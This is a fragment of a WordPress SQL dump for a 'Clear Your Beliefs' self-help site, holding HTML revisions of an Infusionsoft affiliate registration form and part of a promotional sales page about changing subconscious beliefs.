value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option><option value="Holy See (the)">Holy See (the)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran (Islamic Republic of)">Iran (Islamic Republic of)</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Johnston Island">Johnston Island</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea (the Democratic People''s Republic of)">Korea (the Democratic People''s Republic of)</option><option value="Korea (the Republic of)">Korea (the Republic of)</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Lao People''s Democratic Republic (the)">Lao People''s Democratic Republic (the)</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Macedonia (the former Yugoslav Republic of)">Macedonia (the former Yugoslav Republic of)</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands (the)">Marshall Islands (the)</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Micronesia (Federated States of)">Micronesia (Federated States of)</option><option value="Midway Islands">Midway Islands</option><option value="Moldova (the Republic of)">Moldova (the Republic of)</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands (the)">Netherlands (the)</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger (the)">Niger (the)</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands (the)">Northern Mariana Islands (the)</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine, State of">Palestine, State of</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines (the)">Philippines (the)</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Réunion">Réunion</option><option value="Romania">Romania</option><option value="Russian Federation (the)">Russian Federation (the)</option><option value="Rwanda">Rwanda</option><option value="Saint Barthélemy">Saint Barthélemy</option><option value="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Martin (French part)">Saint Martin (French part)</option><option value="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option><option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Sint Maarten (Dutch part)">Sint Maarten (Dutch part)</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="South Sudan">South Sudan</option><option value="Southern Rhodesia">Southern Rhodesia</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan (the)">Sudan (the)</option><option value="Suriname">Suriname</option><option value="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan (Province of China)">Taiwan (Province of China)</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania, United Republic of">Tanzania, United Republic of</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands (the)">Turks and Caicos Islands (the)</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates (the)">United Arab Emirates (the)</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="United States Minor Outlying Islands (the)">United States Minor Outlying Islands (the)</option><option value="Upper Volta">Upper Volta</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela (Bolivarian Republic of)">Venezuela (Bolivarian Republic of)</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands (British)">Virgin Islands (British)</option><option value="Virgin Islands (U.S.)">Virgin Islands (U.S.)</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n        </div>\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div>\r\n        <div>\r\n            <div> </div>\r\n            <div> </div>\r\n        </div>\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div>\r\n        <div class="text">\r\n                    <div class="text" contentid="paragraph">\r\n                        <div>\r\n                            <p>\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n</p>\r\n                            <p>\r\n</p>\r\n                        </div>\r\n                    </div>\r\n        </div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_other_Username">Username *</label>\r\n        <input class="infusion-field-input-container" id="inf_other_Username" name="inf_other_Username" placeholder="Username *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_other_Password">Password *</label>\r\n        <input class="infusion-field-input-container" id="inf_other_Password" name="inf_other_Password" placeholder="Password *" type="password" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_other_RetypePassword">Confirm Password *</label>\r\n        <input class="infusion-field-input-container" id="inf_other_RetypePassword" name="inf_other_RetypePassword" placeholder="Confirm Password *" type="password" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_other_NotifyOnLead">Notify on Lead</label>\r\n        <div class="infusion-radio">\r\n            <div class="options-container">\r\n                <span class="infusion-option">\r\n                    <input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n                    <label for="inf_other_NotifyOnLead_1">Yes</label>\r\n                </span>\r\n                <span class="infusion-option">\r\n                    <input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n                    <label for="inf_other_NotifyOnLead_0">No</label>\r\n                </span>\r\n            </div>\r\n        </div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n        <div class="infusion-radio">\r\n            <div class="options-container">\r\n                <span class="infusion-option">\r\n                    <input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n                    <label for="inf_other_NotifyOnSale_1">Yes</label>\r\n                </span>\r\n                <span class="infusion-option">\r\n                    <input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n                    <label for="inf_other_NotifyOnSale_0">No</label>\r\n                </span>\r\n            </div>\r\n        </div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_SSN">SSN  (U.S. Residents Only)</label>\r\n        <input class="infusion-field-input-container" id="inf_field_SSN" name="inf_field_SSN" placeholder="SSN  (U.S. Residents Only)" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_custom_EIN">EIN (U.S. Businesses Only)</label>\r\n        <input class="infusion-field-input-container" id="inf_custom_EIN" name="inf_custom_EIN" placeholder="EIN (U.S. Businesses Only)" type="text" />\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <span class="infusion-option">\r\n            <input id="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach" name="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach" type="checkbox" value="1402" />\r\n            <label for="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach">Click here if you are a Certified Clear Your Beliefs Coach</label>\r\n        </span>\r\n    </div>\r\n    <div>\r\n        <div>\r\n            <div> </div>\r\n            <div> </div>\r\n        </div>\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <span class="infusion-option">\r\n            <input checked="checked" id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n            <label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n        </span>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n        <input class="infusion-field-input-container" id="inf_custom_PaypalEmailAddress" name="inf_custom_PaypalEmailAddress" placeholder="Paypal Email Address *" type="text" />\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <button class="infusion-recaptcha" id="recaptcha_3f71c00a94d36f3139b9a849b793215b" type="submit">Register!</button>\r\n    </div>\r\n</div>	\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode"></script>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/resources/external/recaptcha/production/recaptcha.js?b=1.68.0.179-hf-201712141430"></script>\r\n<script src="https://www.google.com/recaptcha/api.js?onload=onloadInfusionRecaptchaCallback&render=explicit" async="async" defer="defer"></script>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/timezone/timezoneInputJs?xid=3f71c00a94d36f3139b9a849b793215b"></script>\r\n</div>', 'Affiliate Area', '', 'publish', 'closed', 'closed', '', 'affiliate-area', '', '', '2017-12-17 07:25:38', '2017-12-17 12:25:38', '', 0, 'http://clearyourbeliefs.com/affiliate-area', 0, 'page', '', 0),
(1308, 4194, '2014-07-26 16:52:20', '2014-07-26 21:52:20', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" />\r\n\r\n<input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnLead">Notify on Lead</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnLead_1">Yes</label>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnLead_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnSale_1">Yes</label>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnSale_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-26 16:52:20', '2014-07-26 21:52:20', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1307, 4194, '2014-07-26 14:00:53', '2014-07-26 19:00:53', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0" width="100%">\r\n<tbody>\r\n<tr>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div></td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div></td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div></td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div style="display: none;">\r\n<table border="0">\r\n<tbody>\r\n<tr>\r\n<td width="47%"><label style="margin-left: 50px;" for="inf_other_NotifyOnLead">Notify on Lead</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label style="margin-left: 50px;" for="inf_other_NotifyOnSale">Notify on Sale</label></td>\r\n<td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="float: right;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n<table border="0">\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float: right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-26 14:00:53', '2014-07-26 19:00:53', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(930, 4194, '2014-06-17 16:06:04', '2014-06-17 21:06:04', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the 